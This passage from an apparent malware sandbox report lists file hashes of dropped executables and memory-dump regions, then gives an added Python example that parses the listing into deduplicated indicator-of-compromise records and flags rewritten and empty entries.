8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe
MD5
d0e5c31e51394e9074a5a6846f30fa66
SHA1
6277e6d73a3644cd621d3e579d420778e327c319
SHA256
2bbe188a30253ed5ed8d4211c6a21dc8abdc9c7fe9fd517a972e3f5473acbe37
SHA512
9ea1b66d88318112f0813aea06d173d39db075a49d09c3fad1470abb917ad5a0b1e74549af7baadcc41d4d1854d889a81b9e464044a66c2be03caac868621c40
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe
MD5
533e4744687b587555e0b721da6a5eb6
SHA1
f27aa8aeb98698024148054801d7ecb9352c205a
SHA256
6198565478c35450a1cc92e18b0a17dc5cde2c0b20e28a5266959ed6d77afdff
SHA512
8c0da1291e831b394b31b09e1f597dc3cfb327bf251ad93c5be3bf1c98962267a096dca39e7f5611438e1a9e67b66055aa66c668f42feafeb999b7a8336f6a14
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe
MD5
8cbde3982249e20a6f564eb414f06fe4
SHA1
6d040b6c0f9d10b07f0b63797aa7bfabf0703925
SHA256
4a8a37d0010b2a946e9b202ea07d8b93a29a3ea9a56852678307076e10999c83
SHA512
d84863489b5fb2d17ee1df47de735a88d510bb8f5e378126243e34edb017d3ed82807c7dbd5cf6a977601f0e440be12e680679f1ce472619fd0ebbe9579c3e1b
-
C:\Users\Admin\AppData\Local\Temp\wf-game.exe
MD5
c257b4bc919bb8879e93d8bda00d33a8
SHA1
3ddec6c642927192dd18f2d537aaa1543353309f
SHA256
ba049c72c711c97dcd741fdbbba21544c74808ac37fb64fb2a1e45e4dcc0f48a
SHA512
7a1b09fa5abd064d28bd6c13c850ceac707a9e2f670829957520d81917a110fc25e4f95d213a1b26e2f87afbdbc638785adeeaa3112bf31d9a9e59749b7bac86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
MD5
70d866a270ddce96a72e06f5ada965de
SHA1
620600a1cf4ceafb4170fe8f2e98db38191ba470
SHA256
20712158063b29cc568c38a6bdaf6101c92eba097b57c90df4614e659aa41082
SHA512
95fcbd26a5cf5507f853cc9846c9a766ebd387bac8c07aacba7252ce10434386b73ad200c379346654cf6b307b40d5b59a30f6998cc10b7acf947dccab2f655e
-
C:\Users\Admin\Desktop\Microsoft Edge.lnk
MD5
706183dc555149ed1be9e6cf7a18e258
SHA1
2ed28699f06a6b941d54dfdcc8f30d895d20af65
SHA256
2b58458469b2bc9b36baa98ba1b13dafdd5ccd4107ca542d7244cf3ce459ee08
SHA512
bdd57727c246e49063430ba17c1286a4f9388f3623086444e521254fd256acd5cdd49d5d842c6b8a81db595885054d5436952c7ac08b5983132033e1cc9726a0
-
\??\pipe\LOCAL\crashpad_1864_HTQMLDAATPHZEDDC
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/540-161-0x00007FFEC7150000-0x00007FFEC7151000-memory.dmp
Filesize
4KB
-
memory/2072-203-0x0000000004240000-0x0000000004248000-memory.dmp
Filesize
32KB
-
memory/2072-206-0x0000000004060000-0x0000000004068000-memory.dmp
Filesize
32KB
-
memory/2072-277-0x0000000000400000-0x0000000000510000-memory.dmp
Filesize
1.1MB
-
memory/2072-262-0x00000000045D0000-0x00000000045D8000-memory.dmp
Filesize
32KB
-
memory/2072-207-0x0000000004060000-0x0000000004068000-memory.dmp
Filesize
32KB
-
memory/2072-205-0x0000000004270000-0x0000000004278000-memory.dmp
Filesize
32KB
-
memory/2072-204-0x0000000004250000-0x0000000004258000-memory.dmp
Filesize
32KB
-
memory/2072-202-0x0000000004060000-0x0000000004068000-memory.dmp
Filesize
32KB
-
memory/2072-201-0x0000000004040000-0x0000000004048000-memory.dmp
Filesize
32KB
-
memory/2920-278-0x0000000007690000-0x00000000076A6000-memory.dmp
Filesize
88KB
-
memory/3648-160-0x0000000000870000-0x0000000000879000-memory.dmp
Filesize
36KB
-
memory/3648-159-0x0000000000929000-0x0000000000932000-memory.dmp
Filesize
36KB
-
memory/3648-152-0x0000000000929000-0x0000000000932000-memory.dmp
Filesize
36KB
-
memory/3648-166-0x0000000000400000-0x0000000000409000-memory.dmp
Filesize
36KB
-
memory/4192-136-0x0000000000D80000-0x0000000000DBE000-memory.dmp
Filesize
248KB
-
memory/4204-179-0x000001949A020000-0x000001949A030000-memory.dmp
Filesize
64KB
-
memory/4204-178-0x0000019499990000-0x00000194999A0000-memory.dmp
Filesize
64KB
-
memory/4204-180-0x000001949C710000-0x000001949C714000-memory.dmp
Filesize
16KB
-
memory/4752-168-0x00000000024D0000-0x0000000002567000-memory.dmp
Filesize
604KB
-
memory/4752-167-0x0000000000A48000-0x0000000000AA9000-memory.dmp
Filesize
388KB
-
memory/4752-169-0x0000000000400000-0x000000000049A000-memory.dmp
Filesize
616KB
-
memory/4752-153-0x0000000000A48000-0x0000000000AA9000-memory.dmp
Filesize
388KB
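The dropped-file listing above is more useful as an indicator set than as raw lines, and two things in it deserve a check before the hashes are exported: the same path can appear with more than one digest (jfiag3g_gg.exe and fj4ghga23_fsa.txt were each rewritten during the run, so a single SHA256 per path would miss a variant), and the crashpad named pipe is listed with the digests of zero bytes, so it carried no content and is not an indicator. The parser below is an added example and is not code from this report or from the sandbox that produced it. It reads a constructed excerpt copied from entries on this page in the fused form the page extraction produced, collapses verbatim duplicates by SHA256, and flags both conditions; the function and variable names are mine.

```python
"""Turn the flattened file-hash listing of a sandbox report into IoC records.

Added example, not code from the report or the sandbox. RAW is a constructed
excerpt copied from entries on this page in the fused form the extraction
produced ("<path>MD5", the MD5 value, then "SHA1<hash>", "SHA256<hash>",
"SHA512<hash>"), including one verbatim duplicate, one path that was
rewritten between drops, and the empty crashpad pipe.
"""
import hashlib
import re
from collections import defaultdict

RAW = r"""
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
\??\pipe\LOCAL\crashpad_1864_HTQMLDAATPHZEDDCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

# Expected hex length of each digest the report prints.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HEX = re.compile(r"[0-9a-f]+\Z")


def parse_listing(text):
    """Parse the flattened listing into dicts keyed path, MD5, SHA1, SHA256, SHA512.

    Once list bullets and blank lines are dropped, every entry is five lines:
    the path with 'MD5' fused to its end, the MD5 value on its own line, then
    the three remaining digests each fused to its label.
    """
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln and ln != "-"]
    if len(lines) % 5:
        raise ValueError("listing is not a whole number of 5-line entries")
    records = []
    for i in range(0, len(lines), 5):
        head, md5, *rest = lines[i:i + 5]
        if not head.endswith("MD5"):
            raise ValueError(f"expected '<path>MD5', got {head!r}")
        rec = {"path": head[:-len("MD5")], "MD5": md5}
        for label, field in zip(("SHA1", "SHA256", "SHA512"), rest):
            if not field.startswith(label):
                raise ValueError(f"expected {label} digest, got {field!r}")
            rec[label] = field[len(label):]
        for label, n in DIGEST_LEN.items():
            if len(rec[label]) != n or not HEX.match(rec[label]):
                raise ValueError(f"{rec['path']}: malformed {label} digest")
        records.append(rec)
    return records


def empty_content_digests():
    """Digests of zero bytes; a drop listed with these carried no data."""
    return {label: getattr(hashlib, label.lower())(b"").hexdigest()
            for label in DIGEST_LEN}


def summarize(records):
    """Collapse duplicates by SHA256 and flag what an analyst checks first."""
    unique = {}                     # SHA256 -> first record seen with it
    seen_per_path = defaultdict(set)
    empty = empty_content_digests()
    empty_paths = []
    for rec in records:
        unique.setdefault(rec["SHA256"], rec)
        seen_per_path[rec["path"]].add(rec["SHA256"])
        if all(rec[k] == empty[k] for k in empty):
            empty_paths.append(rec["path"])
    # Same path, different content: the file was rewritten during the run,
    # so every distinct digest for that path belongs in the indicator set.
    rewritten = {p: sorted(s) for p, s in seen_per_path.items() if len(s) > 1}
    return {"unique": unique, "rewritten": rewritten, "empty": empty_paths}


if __name__ == "__main__":
    result = summarize(parse_listing(RAW))
    for sha256, rec in result["unique"].items():
        print(sha256, rec["path"])
    print("rewritten:", result["rewritten"])
    print("empty:", result["empty"])
```

The empty-content check computes the zero-byte digests with hashlib instead of hard-coding them, so it still holds if a report prints a different digest set; the strict five-line shape and hex-length checks make the parser fail loudly on a listing the extraction mangled differently rather than silently emitting a truncated hash.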